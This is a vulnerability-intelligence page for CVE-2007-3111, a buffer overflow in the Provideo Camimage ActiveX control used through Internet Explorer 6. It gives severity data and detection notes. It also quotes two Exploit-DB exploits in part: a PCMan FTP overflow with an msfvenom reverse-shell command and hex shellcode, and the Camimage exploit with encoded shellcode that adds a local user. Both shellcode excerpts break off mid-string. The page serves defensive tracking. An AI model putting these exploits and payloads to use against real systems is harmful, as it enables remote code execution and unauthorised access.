CVE-2007-3111
Published 2007-06-07
Priority P3 49 · critical · CVSS 2.0: 10
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 47.16% (98.7th percentile)
Buffer overflow in the Provideo Camimage ActiveX control in ISSCamControl.dll 1.0.1.5, when Internet Explorer 6 is used on Windows 2000 SP4, allows remote attackers to execute arbitrary code via a long URL property value.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| provideo | camimage_activex_control | — | — |
Detection & IOCs (extracted from sources)
command: `Camimage.URL = "http://www." + String(97,"a") + seh_handler + nop + shellcode + nop + ".com"`
- Monitor for ActiveX instantiation of the Provideo Camimage control (ISSCamControl.dll) within Internet Explorer; a long string (>97 'a' chars) passed to the URL property is the exploit trigger.
- The exploit constructs a malicious URL of the form 'http://www.' + 97×'a' + SEH_overwrite + NOP_sled + shellcode + '.com' assigned to Camimage.URL; detect abnormally long URL property values set on this ActiveX control.
- The SEH overwrite targets address 0x77e6161e ('call edi') inside user32.dll on Windows 2000 SP4; look for SEH chain corruption pointing to this address in crash/exploit telemetry.
- The shellcode payload adds a local user account ('su'/'tzu'); post-exploitation, monitor for unexpected new local user creation following ISSCamControl.dll activity.
- Note: the exploit and SEH gadget address (0x77e6161e in user32.dll) are specific to Windows 2000 SP4 with Internet Explorer 6; the address will differ on other OS/patch levels.
No detection rules found.
Exploit-DB
PCMan FTP Server 2.0.7 - Buffer Overflow
exploitdb·2025-06-15·CVSS 6.9
CVE-2025-4255 [MEDIUM] PCMan FTP Server 2.0.7 - Buffer Overflow
---
# Exploit Title: PCMan FTP Server 2.0.7 - Buffer Overflow
# Date: 04/17/2025
# Exploit Author: Fernando Mengali
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3 - # Version 5.1 (Build 2600.xpsp.080413-3111 : Service Pack 2)
# CVE: CVE-2025-4255
# msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444 EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
#offset: 2007
#badchars: \x00\x0a\x0d
#EIP: 0x74e32fd9 (JMP ESP)
my $buf =
"\xbd\xcc\x95\x24\x8c\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" .
"\xb1\x52\x31\x6a\x12\x83\xc2\x04\x03\xa6\x9b\xc6\x79\xca" .
"\x4c\x84\x82\x32\x8d\xe9\x0b\xd
Exploit-DB
Microsoft Internet Explorer 6 / Provideo Camimage - 'ISSCamControl.dll 1.0.1.5' Remote Buffer Overflow
exploitdb·2007-06-02
CVE-2007-3111 Microsoft Internet Explorer 6 / Provideo Camimage - 'ISSCamControl.dll 1.0.1.5' Remote Buffer Overflow
---
REM metasploit one, add a user 'su' with pass 'tzu'
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%
No writeups or analysis indexed.
- http://osvdb.org/36962
- http://secunia.com/advisories/25479
- http://www.securityfocus.com/bid/24279
- http://www.vupen.com/english/advisories/2007/2042
- https://exchange.xforce.ibmcloud.com/vulnerabilities/34691
- https://www.exploit-db.com/exploits/4023
Published: 2007-06-07